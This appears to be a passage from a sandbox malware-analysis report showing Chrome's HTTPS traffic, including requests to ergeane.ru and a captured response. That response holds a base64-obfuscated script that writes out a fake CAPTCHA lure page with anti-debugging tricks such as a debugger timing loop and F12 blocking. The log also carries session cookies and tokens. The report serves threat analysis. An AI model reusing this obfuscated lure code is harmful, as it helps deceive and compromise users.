                                                                                                                                                                                                                                  2024-12-18 19:29:05 UTC1369INData Raw: 63 6c 38 67 41 58 35 41 63 72 47 53 59 71 35 51 49 74 43 69 55 6f 4a 68 55 69 44 51 77 44 45 50 4d 35 44 67 67 2f 2f 66 67 42 46 78 38 57 53 42 30 62 50 67 49 38 4f 54 41 65 48 6b 73 79 49 55 78 49 4e 68 45 56 51 79 73 55 46 56 51 2b 47 54 70 55 51 52 30 32 52 30 56 6d 61 46 73 71 50 46 31 67 4f 46 78 51 4b 58 4a 41 61 30 31 7a 54 6d 74 76 64 54 70 7a 4f 6c 68 4d 63 47 74 65 55 46 71 42 58 7a 39 52 53 6d 4a 45 56 6e 39 6e 59 59 68 62 58 57 5a 74 63 47 5a 56 56 6c 6d 4f 65 58 78 78 6c 32 70 74 6a 58 4b 6c 66 5a 52 34 71 5a 65 66 69 58 75 6e 69 6f 39 37 66 6e 4a 37 63 48 47 32 72 49 75 69 75 33 61 33 6a 4a 56 36 6c 49 79 69 67 72 2b 79 73 73 66 43 70 34 44 49 6e 63 57 41 78 71 53 4f 6a 74 54 4f 7a 71 2b 4f 30 38 4c 4d 6c 64 6d 7a 6d 70 2b 7a 6e 70 36 65 70
                                                                                                                                                                                                                                  Data Ascii: cl8gAX5AcrGSYq5QItCiUoJhUiDQwDEPM5Dgg//fgBFx8WSB0bPgI8OTAeHksyIUxINhEVQysUFVQ+GTpUQR02R0VmaFsqPF1gOFxQKXJAa01zTmtvdTpzOlhMcGteUFqBXz9RSmJEVn9nYYhbXWZtcGZVVlmOeXxxl2ptjXKlfZR4qZefiXunio97fnJ7cHG2rIuiu3a3jJV6lIyigr+yssfCp4DIncWAxqSOjtTOzq+O08LMldmzmp+znp6ep
                                                                                                                                                                                                                                  2024-12-18 19:29:05 UTC601INData Raw: 71 41 2b 76 6d 47 79 49 54 4b 42 38 49 48 2b 2f 70 37 67 7a 7a 4d 2f 6f 64 2f 53 48 2b 49 45 4e 42 4c 69 59 42 48 67 63 55 42 67 70 4b 4f 77 38 38 48 42 70 50 54 56 5a 57 46 46 51 30 4f 52 4d 74 47 31 31 67 57 78 6f 67 48 46 42 41 54 32 56 69 49 32 67 6b 61 55 63 74 4c 57 74 41 58 79 78 63 55 46 51 75 64 57 4a 71 66 48 68 79 65 6a 6c 36 57 7a 78 43 4e 6b 4a 46 68 48 42 67 58 49 4a 6a 62 46 5a 4e 6a 58 43 50 69 6d 68 4c 63 49 35 76 62 4a 65 52 63 34 71 5a 6e 35 6d 64 56 46 32 4f 67 48 43 6c 66 57 4f 59 61 47 75 44 6e 32 61 6e 71 71 71 76 64 4a 36 48 64 62 57 6d 6a 36 2b 31 64 6e 64 34 76 61 44 43 76 6f 54 46 73 63 53 47 74 6f 47 48 6f 5a 79 6a 79 37 47 50 73 6f 76 50 71 4c 54 59 7a 39 4b 56 6d 63 58 47 32 74 53 53 33 63 50 61 74 5a 2f 66 33 62 36 66 34 75
                                                                                                                                                                                                                                  Data Ascii: qA+vmGyITKB8IH+/p7gzzM/od/SH+IENBLiYBHgcUBgpKOw88HBpPTVZWFFQ0ORMtG11gWxogHFBAT2ViI2gkaUctLWtAXyxcUFQudWJqfHhyejl6WzxCNkJFhHBgXIJjbFZNjXCPimhLcI5vbJeRc4qZn5mdVF2OgHClfWOYaGuDn2anqqqvdJ6HdbWmj6+1dnd4vaDCvoTFscSGtoGHoZyjy7GPsovPqLTYz9KVmcXG2tSS3cPatZ/f3b6f4u


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  51192.168.2.1649811104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:06 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1242342259:1734549062:rcwFK2sENi_jYVVwqfENsIj5TcEuZRVTF9ti3g2cwpM/8f418ee08bfa41f8/ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRno HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:29:07 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:07 GMT
                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                  Content-Length: 7
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                  cf-chl-out: iWMeS0Murjp4frzFQRfxAObRLPs1B5PqXK8=$gsqnrhiM8gNk3m99
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418f52cee26a55-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:29:07 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                  Data Ascii: invalid


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  52192.168.2.1649810142.250.181.1104436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:06 UTC681OUTGET /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=520=CvBdONSJlOTXnPiCO4EuPPFwvm0EaFxj7trDUyhNNdFc6G_FN1wH_QPEbYiZW0zQgkXFtiKQ0CKMDykCIwoc1fzoCwzEPxrgu2FWeoTKNu9NzfggmrBkrEfHI_tjT5TooUS_woqpRCCLaM_geIXvbdzesLAux08s102TrUKtXHfaEykl1Gw9Z1ln7n90-KkG
                                                                                                                                                                                                                                  2024-12-18 19:29:07 UTC270INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:07 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Server: Playlog
                                                                                                                                                                                                                                  Content-Length: 1555
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-12-18 19:29:07 UTC1120INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-
                                                                                                                                                                                                                                  2024-12-18 19:29:07 UTC435INData Raw: 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e
                                                                                                                                                                                                                                  Data Ascii: pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  53192.168.2.1649816104.21.32.2254436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:07 UTC1443OUTGET /yNriUGk0/ HTTP/1.1
                                                                                                                                                                                                                                  Host: 32.ergeane.ru
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                  Referer: https://52kz793.afratradingagency.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IlBSMUtzOTd4YWc3MHFGeG5HTlR2SVE9PSIsInZhbHVlIjoiOVpNUFJhRkh0c2R2WDFvR2RnM3JIdEM5Z3BhY3ExYjB1eGtQSTFkZHZGNzZXM1h3NVY5SWFFSUxtY3Vlc1M2OUpzZGY1L3hPdzhmOWVBaFJhVWtBdXBkYzY4ZkdTM0pkMU9RR3dFY2FvZFI5ZWJSZjcreUo5Wld4ZkluTlF3dDYiLCJtYWMiOiI1NjFkM2M1NzA5YWI4ZmRlNDAyODE3ZDZkYzhhYzI0OTMzZTRhMjMzOTE1NmJkZGVhNDgwYzExYzIxYTBkZDZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxQSFNRczFxZnUxOVRCMEFnaTAzeXc9PSIsInZhbHVlIjoiSlNIWEVOMUl5L29FMGU3STVSdzlQN2FBK1E0NWY0c3Q2dVcvMzFvbnZwTG1laiszS05TVnRybzBNNStSM2JuVndXRTYwSm0wSWdSZVhJTFp1Slk5ejh1aDROZTVSNDJyUnlpckswNWFuWnFZNllhandnOGt1QURzZW9MQys3Y0UiLCJtYWMiOiIyMjU2YTMyMWRkZTNhZDIzZTEyMTRjOWEzNmNiNjhhMWQ0ODM5Y2Q4NTBhMWFlZTUwNDQ5NDM2ZDMwMjEzMDIyIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                  2024-12-18 19:29:08 UTC1254INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:08 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Cache-Control: no-cache, private
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QvZ293BvYUPBCj08Lxh52MSDWfUwsg9p0CKBdVL4f%2Bdt1AOvKgQHaQRy%2BL8DXw1i9ZuFtOBDlQSE%2BiOpwoUFBbXWFPy8C1jMMPdu4Ol0q8VxUVc2CwoMvl9X%2BB4amg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1439&min_rtt=1235&rtt_var=43&sent=223&recv=133&lost=0&retrans=0&sent_bytes=200432&recv_bytes=23293&delivery_rate=23256230&cwnd=257&unsent_bytes=0&cid=711ee83a7c5484c6&ts=242297&x=0"
                                                                                                                                                                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IlVFYVNzQ29HZTZpYUxCZTFaUEJhbGc9PSIsInZhbHVlIjoia3p6M0dsN1FvUGgza1ArUkRabWNYTmhvOFdaLys4a2gzaTJONlZYZ09FY1RtZkdxdUJ4TDVIZWh2VXNOMndpcmI2QytzVzkreEZhMTRUdkRJSXo0Zi8rN1dHdzlPZTBBcFlEVkpydFlNWFlESFhvQllBRFZHK2JNeUIrNWV2dFEiLCJtYWMiOiI4ZmU5MDNmMmU0ODYxYTFlZmU4MGFiYmUyMmE1ZGY1NDY2MTA1Y2U5Zjc2OWE3NzQ2YjgxZDAyNDMxZjI4ZTBjIiwidGFnIjoiIn0%3D; expires=Wed, 18-Dec-2024 21:29:08 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                  2024-12-18 19:29:08 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 52 4b 51 6c 42 55 4f 57 78 78 65 43 39 51 64 54 4d 31 52 58 6f 78 5a 6b 34 33 56 48 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 6b 55 76 55 6c 5a 6e 4d 45 35 6b 59 55 31 72 64 6a 68 55 61 6e 59 31 61 44 63 30 56 6b 63 77 65 54 52 73 53 45 35 59 57 57 46 49 64 6e 51 78 54 53 38 78 57 6d 4e 45 57 6b 35 75 4e 57 4a 7a 64 44 46 6c 4e 47 39 57 56 33 5a 4a 64 57 49 79 61 30 52 59 56 7a 5a 6e 53 69 74 34 54 47 46 4c 51 30 31 46 55 56 56 6a 52 57 31 6f 4f 46 56 55 5a 57 6c 6f 54 58 5a 4d 65 56 4a 33 55 45 4a 34 63 6b 6b 33 4e 54 63 79 4d 6b 4e 77 56 54 41 72 64 47 70 4a 64 45 74 42 55 32 4e 46 54 46 4e 55 65 54 42 35 57 54 46 76 56 55 59
                                                                                                                                                                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InRKQlBUOWxxeC9QdTM1RXoxZk43VHc9PSIsInZhbHVlIjoiakUvUlZnME5kYU1rdjhUanY1aDc0VkcweTRsSE5YWWFIdnQxTS8xWmNEWk5uNWJzdDFlNG9WV3ZJdWIya0RYVzZnSit4TGFLQ01FUVVjRW1oOFVUZWloTXZMeVJ3UEJ4ckk3NTcyMkNwVTArdGpJdEtBU2NFTFNUeTB5WTFvVUY
                                                                                                                                                                                                                                  2024-12-18 19:29:08 UTC1369INData Raw: 37 66 66 61 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 74 68 65 20 73 75 6d 20 6f 66 20 73 6d 61 6c 6c 20 65 66 66 6f 72 74 73 2c 20 72 65 70 65 61 74 65 64 20 64 61 79 20 69 6e 20 61 6e 64 20 64 61 79 20 6f 75 74 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 7a 4d 69 35 6c 63 6d 64 6c 59 57 35 6c 4c 6e 4a 31 4c 33 6c 4f 63 6d 6c 56 52 32 73 77 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f
                                                                                                                                                                                                                                  Data Ascii: 7ffa<script>/* Success is the sum of small efforts, repeated day in and day out. */if(atob("aHR0cHM6Ly8zMi5lcmdlYW5lLnJ1L3lOcmlVR2swLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo
                                                                                                                                                                                                                                  2024-12-18 19:29:08 UTC1369INData Raw: 58 67 36 49 44 45 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 73 4e 43 69 41 67 49 43 42 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 64 32 68 70 64 47 55 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 79 4e 48 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 6e 30 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4a 76 65 43 42 37 44 51 6f 67 49 43 41 67
                                                                                                                                                                                                                                  Data Ascii: Xg6IDE7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAg
                                                                                                                                                                                                                                  2024-12-18 19:29:08 UTC1369INData Raw: 52 6a 61 47 45 74 59 32 68 6c 59 32 74 69 62 33 67 67 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 69 59 32 68 6c 59 32 74 69 62 33 67 69 58 54 70 6a 61 47 56 6a 61 32 56 6b 49 43 73 67 62 47 46 69 5a 57 77 67 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 68 6c 59 32 74 74 59 58 4a 72 4f 6a 70 68 5a 6e 52 6c 63 69 42 37 44 51 6f 67 49 43 41 67 59 32 39 75 64 47 56 75 64 44 6f 67 49 69 49 37 44 51 6f 67 49 43 41 67 63 47 39 7a 61 58 52 70 62 32 34 36 49 47 46 69 63 32 39 73 64 58 52 6c 4f 77 30 4b 49 43 41 67 49 47 78 6c 5a 6e 51 36 49 44 56 77 65 44 73 4e 43 69 41 67 49 43 42 30 62 33 41 36 49 44 46 77 65 44 73 4e 43 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 4a 77 65 44 73 4e 43
                                                                                                                                                                                                                                  Data Ascii: RjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXTpjaGVja2VkICsgbGFiZWwgLmNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNC
                                                                                                                                                                                                                                  2024-12-18 19:29:08 UTC1369INData Raw: 67 49 43 42 6d 62 47 56 34 4c 57 52 70 63 6d 56 6a 64 47 6c 76 62 6a 6f 67 59 32 39 73 64 57 31 75 4f 77 30 4b 49 43 41 67 49 47 46 73 61 57 64 75 4c 57 6c 30 5a 57 31 7a 4f 69 42 6a 5a 57 35 30 5a 58 49 37 44 51 6f 67 49 43 41 67 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 44 51 6f 67 49 43 41 67 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4d 54 42 77 65 44 73 4e 43 6e 30 4e 43 67 30 4b 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 39 75 64 47 56 75 64 43 42 70 62 57 63 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 49 44 45 77 63 48 67 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 6c 62 6e 51 67 61 57
                                                                                                                                                                                                                                  Data Ascii: gICBmbGV4LWRpcmVjdGlvbjogY29sdW1uOw0KICAgIGFsaWduLWl0ZW1zOiBjZW50ZXI7DQogICAgd2lkdGg6IDEwMCU7DQogICAgbWFyZ2luLXRvcDogMTBweDsNCn0NCg0KLmNhcHRjaGEtY29udGVudCBpbWcgew0KICAgIHdpZHRoOiAxMDAlOw0KICAgIG1hcmdpbi1ib3R0b206IDEwcHg7DQp9DQoNCi5jYXB0Y2hhLWNvbnRlbnQgaW
                                                                                                                                                                                                                                  2024-12-18 19:29:08 UTC1369INData Raw: 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f
                                                                                                                                                                                                                                  Data Ascii: dGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQo
                                                                                                                                                                                                                                  2024-12-18 19:29:08 UTC1369INData Raw: 43 41 67 49 47 4e 76 62 6e 4e 30 49 46 70 61 63 48 68 70 55 48 5a 61 61 6e 6f 67 50 53 41 78 4d 44 41 37 44 51 6f 67 49 43 41 67 63 32 56 30 53 57 35 30 5a 58 4a 32 59 57 77 6f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 47 56 4d 5a 58 64 36 52 57 74 68 63 6e 51 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 47 56 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 45 74 4a 51 6d 31 4a 56 55 64 71 61 6c 49 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 45 74 4a 51 6d 31 4a 56 55 64 71
                                                                                                                                                                                                                                  Data Ascii: CAgIGNvbnN0IFpacHhpUHZaanogPSAxMDA7DQogICAgc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGNvbnN0IGVMZXd6RWthcnQgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgZGVidWdnZXI7DQogICAgICAgIGNvbnN0IEtJQm1JVUdqalIgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKEtJQm1JVUdq
                                                                                                                                                                                                                                  2024-12-18 19:29:08 UTC1369INData Raw: 41 67 49 43 41 67 50 47 6c 74 5a 79 42 7a 63 6d 4d 39 49 6d 52 68 64 47 45 36 61 57 31 68 5a 32 55 76 63 47 35 6e 4f 32 4a 68 63 32 55 32 4e 43 78 70 56 6b 4a 50 55 6e 63 77 53 30 64 6e 62 30 46 42 51 55 46 4f 55 31 56 6f 52 56 56 6e 51 55 46 42 57 55 46 42 51 55 46 48 51 55 4e 42 54 55 46 42 51 55 4e 55 52 31 56 58 54 6b 46 42 51 55 46 4a 52 30 35 4a 56 57 73 77 51 55 46 49 62 32 31 42 51 55 4e 42 61 45 46 42 51 53 74 6e 51 55 46 42 53 55 52 76 51 55 46 43 4d 55 31 42 51 55 45 32 62 55 46 42 51 55 52 78 57 55 46 42 51 56 68 6a 53 6e 6b 32 56 56 52 33 51 55 46 42 52 6e 68 56 52 58 68 56 55 6c 46 42 51 55 46 4d 4f 47 64 4a 55 43 73 76 51 55 31 4e 61 30 68 4e 56 57 6c 49 63 31 56 71 53 55 31 56 61 55 67 34 56 57 6c 49 4f 46 56 71 53 44 68 5a 61 6b 67 34 54
